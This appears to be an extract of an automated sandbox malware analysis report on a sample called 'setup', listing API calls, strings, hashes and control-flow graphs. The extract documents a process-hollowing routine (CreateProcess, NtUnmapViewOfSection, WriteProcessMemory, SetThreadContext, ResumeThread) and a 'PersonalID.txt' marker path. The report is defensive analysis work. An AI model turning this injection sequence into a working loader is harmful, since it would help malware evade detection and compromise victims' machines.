                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                • String ID: vector<T> too long
                • API String ID: 1327501947-3788999226
                • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _fputws$CreateDirectory
                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                • API String ID: 2590308727-54166481
                • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                APIs
                Strings
                • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt
                • String ID: Assertion failed: %s, file %s, line %d
                • API String ID: 3494438863-969893948
                • Opcode ID: 9da3a8cb00f8be44138af9ef65efde1430dd0e2db54f2e174abcd107dffc3b0f
                • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                • Opcode Fuzzy Hash: 9da3a8cb00f8be44138af9ef65efde1430dd0e2db54f2e174abcd107dffc3b0f
                • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                APIs
                • _memset.LIBCMT ref: 00480686
                  • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                Strings
                • .\crypto\evp\digest.c, xrefs: 00480638
                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _memset_raise
                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                • API String ID: 1484197835-3867593797
                • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                APIs
                • std::exception::exception.LIBCMT ref: 0044F251
                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                • __CxxThrowException@8.LIBCMT ref: 0044F266
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2116193035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.2116193035.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.2116193035.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                • String ID: TeM
                • API String ID: 757275642-2215902641
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

                Execution Graph

                Execution Coverage:1.1%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:38
                Total number of Limit Nodes:8
                execution_graph 33554 64a026 33555 64a035 33554->33555 33558 64a7c6 33555->33558 33559 64a7e1 33558->33559 33560 64a7ea CreateToolhelp32Snapshot 33559->33560 33561 64a806 Module32First 33559->33561 33560->33559 33560->33561 33562 64a815 33561->33562 33564 64a03e 33561->33564 33565 64a485 33562->33565 33566 64a4b0 33565->33566 33567 64a4c1 VirtualAlloc 33566->33567 33568 64a4f9 33566->33568 33567->33568 33568->33568 33569 2070000 33572 2070630 33569->33572 33571 2070005 33573 207064c 33572->33573 33575 2071577 33573->33575 33578 20705b0 33575->33578 33581 20705dc 33578->33581 33579 20705e2 GetFileAttributesA 33579->33581 33580 207061e 33581->33579 33581->33580 33583 2070420 33581->33583 33584 20704f3 33583->33584 33585 20704ff CreateWindowExA 33584->33585 33586 20704fa 33584->33586 33585->33586 33587 2070540 PostMessageA 33585->33587 33586->33581 33588 207055f 33587->33588 33588->33586 33590 2070110 VirtualAlloc GetModuleFileNameA 33588->33590 33591 2070414 33590->33591 33592 207017d CreateProcessA 33590->33592 33591->33588 33592->33591 33594 207025f VirtualFree VirtualAlloc Wow64GetThreadContext 33592->33594 33594->33591 33595 20702a9 ReadProcessMemory 33594->33595 33596 20702e5 VirtualAllocEx NtWriteVirtualMemory 33595->33596 33597 20702d5 NtUnmapViewOfSection 33595->33597 33598 207033b 33596->33598 33597->33596 33599 2070350 NtWriteVirtualMemory 33598->33599 33600 207039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33598->33600 33599->33598 33601 20703fb ExitProcess 33600->33601

                Control-flow Graph

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02070156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0207016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 02070255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02070270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02070283
                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0207029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 020702C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 020702E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02070304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0207032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02070399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 020703BF
                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 020703E1
                • ResumeThread.KERNELBASE(00000000), ref: 020703ED
                • ExitProcess.KERNEL32(00000000), ref: 02070412
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 93872480-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: 0dde773c238e671aff098a3e8f1a3164b3aa0c1e72e54988668a83892deeaef0
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: B5B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 15 2070420-20704f8 17 20704ff-207053c CreateWindowExA 15->17 18 20704fa 15->18 20 2070540-2070558 PostMessageA 17->20 21 207053e 17->21 19 20705aa-20705ad 18->19 22 207055f-2070563 20->22 21->19 22->19 23 2070565-2070579 22->23 23->19 25 207057b-2070582 23->25 26 2070584-2070588 25->26 27 20705a8 25->27 26->27 28 207058a-2070591 26->28 27->22 28->27 29 2070593-2070597 call 2070110 28->29 31 207059c-20705a5 29->31 31->27
                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02070533
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: b237aa8c98677df783333cd299bfe89e82b16ab7caac56a651f5ed2803eeab9c
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: 66512B70D08388DEEB11CBD8C849BDEBFB26F11708F144158D5447F286C3BA5658CBA6

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 32 20705b0-20705d5 33 20705dc-20705e0 32->33 34 20705e2-20705f5 GetFileAttributesA 33->34 35 207061e-2070621 33->35 36 20705f7-20705fe 34->36 37 2070613-207061c 34->37 36->37 38 2070600-207060b call 2070420 36->38 37->33 40 2070610 38->40 40->37
                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 020705EC
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: 2cda26ea197c798108611432574ad21deaec644eda0a3dd4fcb654bc6cb94691
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: 1C012170C0425CEFDF11DB98C5583AEBFB6AF41308F1481D9C4092B241D7769B58DBA5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 41 64a7c6-64a7df 42 64a7e1-64a7e3 41->42 43 64a7e5 42->43 44 64a7ea-64a7f6 CreateToolhelp32Snapshot 42->44 43->44 45 64a806-64a813 Module32First 44->45 46 64a7f8-64a7fe 44->46 47 64a815-64a816 call 64a485 45->47 48 64a81c-64a824 45->48 46->45 52 64a800-64a804 46->52 53 64a81b 47->53 52->42 52->45 53->48
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0064A7EE
                • Module32First.KERNEL32(00000000,00000224), ref: 0064A80E
                Memory Dump Source
                • Source File: 00000005.00000002.2127962943.000000000064A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0064A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_64a000_setup.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: 241c7a421c2a0c16d55d957ba020cb3e08ffbf5d5c299131283afbfb23bc38d9
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: 67F096352407107FD7203BF5A88DBAF76F9EF59725F104528E642911C0DBB0EC464662

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 54 64a485-64a4bf call 64a798 57 64a4c1-64a4f4 VirtualAlloc call 64a512 54->57 58 64a50d 54->58 60 64a4f9-64a50b 57->60 58->58 60->58
                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0064A4D6
                Memory Dump Source
                • Source File: 00000005.00000002.2127962943.000000000064A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0064A000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_64a000_setup.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: 66d338d6ae3772a6ab5ff07483c4a74496d7e9021f84b77b637bbe1b8fdb46ee
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: E4112D79A40208FFDB01DF98CA85E99BBF5AF08350F058094F9489B361D375EA50DF85

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 551 2096437-2096440 552 2096442-2096446 551->552 553 2096466 551->553 552->553 554 2096448-2096459 call 2099636 552->554 555 2096468-209646b 553->555 558 209645b-2096460 call 2095ba8 554->558 559 209646c-209647d call 2099636 554->559 558->553 564 2096488-209649a call 2099636 559->564 565 209647f-2096480 call 209158d 559->565 570 20964ac-20964cd call 2095f4c call 2096837 564->570 571 209649c-20964aa call 209158d * 2 564->571 569 2096485-2096486 565->569 569->558 580 20964cf-20964dd call 209557d 570->580 581 20964e2-2096500 call 209158d call 2094edc call 2094d82 call 209158d 570->581 571->569 587 20964df 580->587 588 2096502-2096505 580->588 590 2096507-2096509 581->590 587->581 588->590 590->555
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                • String ID:
                • API String ID: 1442030790-0
                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction ID: 93277eda096272f324935033a8c178697c43ddc4789c708568fa8d141ddd5137
                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction Fuzzy Hash: 7121AE35204701EBEF227FA5DC01E8BBBEAEF42760B508029E48B590A4EB238550FE51

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 595 2093f16-2093f2f 596 2093f49-2093f5e call 209bdc0 595->596 597 2093f31-2093f3b call 2095ba8 call 2094c72 595->597 596->597 602 2093f60-2093f63 596->602 606 2093f40 597->606 604 2093f65 602->604 605 2093f77-2093f7d 602->605 608 2093f6b-2093f75 call 2095ba8 604->608 609 2093f67-2093f69 604->609 610 2093f89-2093f9a call 20a0504 call 20a01a3 605->610 611 2093f7f 605->611 607 2093f42-2093f48 606->607 608->606 609->605 609->608 619 2093fa0-2093fac call 20a01cd 610->619 620 2094185-209418f call 2094c9d 610->620 611->608 613 2093f81-2093f87 611->613 613->608 613->610 619->620 625 2093fb2-2093fbe call 20a01f7 619->625 625->620 628 2093fc4-2093fcb 625->628 629 209403b-2094046 call 20a02d9 628->629 630 2093fcd 628->630 629->607 636 209404c-209404f 629->636 632 2093fcf-2093fd5 630->632 633 2093fd7-2093ff3 call 20a02d9 630->633 632->629 632->633 633->607 640 2093ff9-2093ffc 633->640 638 209407e-209408b 636->638 639 2094051-209405a call 20a0554 636->639 642 209408d-209409c call 20a0f40 638->642 639->638 650 209405c-209407c 639->650 643 209413e-2094140 640->643 644 2094002-209400b call 20a0554 640->644 651 20940a9-20940d0 call 20a0e90 call 20a0f40 642->651 652 209409e-20940a6 642->652 643->607 644->643 653 2094011-2094029 call 20a02d9 644->653 650->642 661 20940de-2094105 call 20a0e90 call 20a0f40 651->661 662 20940d2-20940db 651->662 652->651 653->607 658 209402f-2094036 653->658 658->643 667 2094113-2094122 call 20a0e90 661->667 668 2094107-2094110 661->668 662->661 671 209414f-2094168 667->671 672 2094124 667->672 668->667 675 209413b 671->675 676 209416a-2094183 671->676 673 209412a-2094138 672->673 674 2094126-2094128 672->674 673->675 674->673 677 2094145-2094147 674->677 675->643 676->643 677->643 678 2094149 677->678 678->671 679 209414b-209414d 678->679 679->643 679->671
                APIs
                • _memset.LIBCMT ref: 02093F51
                  • Part of subcall function 02095BA8: __getptd_noexit.LIBCMT ref: 02095BA8
                • __gmtime64_s.LIBCMT ref: 02093FEA
                • __gmtime64_s.LIBCMT ref: 02094020
                • __gmtime64_s.LIBCMT ref: 0209403D
                • __allrem.LIBCMT ref: 02094093
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020940AF
                • __allrem.LIBCMT ref: 020940C6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020940E4
                • __allrem.LIBCMT ref: 020940FB
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02094119
                • __invoke_watson.LIBCMT ref: 0209418A
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                • String ID:
                • API String ID: 384356119-0
                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction ID: afeb8f10ac7cc945c1a3bbe333d3b9224bf16312b5589cc7e5c7476e5eaa99f3
                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                • Instruction Fuzzy Hash: A071F771A0071AABEF159F79CC51BAAB3FAAF00364F144279E516E7680E770D901BF90

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                • String ID:
                • API String ID: 3432600739-0
                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction ID: 2030dac1108be37c139f5593323ffc3bc8fbd742eb059cde8dfb9437785aaa8d
                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                • Instruction Fuzzy Hash: B8411232904309AFDF01AFA4DC80BDE7BEAAF44314F10842DE91696290DB769645FF21

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 744 20984ab-20984d9 call 2098477 749 20984db-20984de 744->749 750 20984f3-209850b call 209158d 744->750 751 20984ed 749->751 752 20984e0-20984eb call 209158d 749->752 756 209850d-209850f 750->756 757 2098524-209855a call 209158d * 3 750->757 751->750 752->749 752->751 759 209851e 756->759 760 2098511-209851c call 209158d 756->760 769 209856b-209857e 757->769 770 209855c-2098562 757->770 759->757 760->756 760->759 775 209858d-2098594 769->775 776 2098580-2098587 call 209158d 769->776 770->769 771 2098564-209856a call 209158d 770->771 771->769 778 20985a3-20985ae 775->778 779 2098596-209859d call 209158d 775->779 776->775 782 20985cb-20985cd 778->782 783 20985b0-20985bc 778->783 779->778 783->782 785 20985be-20985c5 call 209158d 783->785 785->782
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free$ExitProcess___crt
                • String ID:
                • API String ID: 1022109855-0
                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction ID: 223602c843ac7595adbf491a15c507ef9290d2b05c884cfe4e0815205109a242
                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                • Instruction Fuzzy Hash: 2331D431A00351DBCF625F14FC80889B7E6FB16324305C66AE90A573A0CBB459C8BF90
                APIs
                • std::exception::exception.LIBCMT ref: 020BFC1F
                  • Part of subcall function 020A169C: std::exception::_Copy_str.LIBCMT ref: 020A16B5
                • __CxxThrowException@8.LIBCMT ref: 020BFC34
                • std::exception::exception.LIBCMT ref: 020BFC4D
                • __CxxThrowException@8.LIBCMT ref: 020BFC62
                • std::regex_error::regex_error.LIBCPMT ref: 020BFC74
                  • Part of subcall function 020BF914: std::exception::exception.LIBCMT ref: 020BF92E
                • __CxxThrowException@8.LIBCMT ref: 020BFC82
                • std::exception::exception.LIBCMT ref: 020BFC9B
                • __CxxThrowException@8.LIBCMT ref: 020BFCB0
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                • String ID: leM
                • API String ID: 3569886845-2926266777
                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction ID: 1d83fc53f967d0efe13b2e69137a13b423ef5b7aa77cd3daf7febc6139f264cd
                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                • Instruction Fuzzy Hash: A411AA79C0030DBBCB00FFE5D865CDDBB7DAB04344F808566A92897641EB74A3489F94
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: _free_malloc_wprintf$_sprintf
                • String ID:
                • API String ID: 3721157643-0
                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction ID: 026bd1c2f1228d4a287a9bb54cfd7e2ea31a9a65cff701a70dc203f4f689b600
                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                • Instruction Fuzzy Hash: 6E11E4B2A017547ACA62B7B55C15EFF7ADD9F45702F0400A9FE8ED1180DA185A04BBB1
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                • String ID:
                • API String ID: 65388428-0
                • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction ID: d54360b191dc35ce6881646e2280a48951af8761742fec2936b7cf9849971888
                • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                • Instruction Fuzzy Hash: 9A514971D40309ABDB11EBA5DC86FEFBBB9FF04B04F140025F949B6180EB746A019BA5
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction ID: 5fff6fb27b556107c880fab01584734fe19f89241ea7d327ca5fa95c38b65a86
                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                • Instruction Fuzzy Hash: 9D5140B1D4030AEADF11DFE1DC86FEEBBB9EB04704F100125F905B6580E7B5AA059BA5
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_memset_sprintf
                • String ID:
                • API String ID: 217217746-0
                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction ID: 7377639c860b0e24de1b1a70bcf66ea59471391018ff12547522c392752f5684
                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                • Instruction Fuzzy Hash: 6A515F71D4030AABDF21DFA1DC45FEFBBB9FB04704F100129EA06B6580E774AA059BA4
                APIs
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                • String ID:
                • API String ID: 3534693527-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: 293584add8f947e1ac385764f45fd7f5619da197b1e6119d1a47d72665b5eef5
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: FB31D172A103256FEF736A649C00BEE37E59F05B24F114815ED05EB284DB748541FBA1
                APIs
                • __getptd_noexit.LIBCMT ref: 021366DD
                  • Part of subcall function 020959BF: __calloc_crt.LIBCMT ref: 020959E2
                  • Part of subcall function 020959BF: __initptd.LIBCMT ref: 02095A04
                • __calloc_crt.LIBCMT ref: 02136700
                • __get_sys_err_msg.LIBCMT ref: 0213671E
                • __invoke_watson.LIBCMT ref: 0213673B
                • __get_sys_err_msg.LIBCMT ref: 0213676D
                • __invoke_watson.LIBCMT ref: 0213678B
                Memory Dump Source
                • Source File: 00000005.00000002.2128184968.0000000002070000.00000040.00001000.00020000.00000000.sdmp, Offset: 02070000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2070000_setup.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                • String ID:
                • API String ID: 4066021419-0
                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                • Instruction ID: 62ed348e600f392da27b218a2dad21a6b4f8f641155ff0f570e7d666dc2e7530
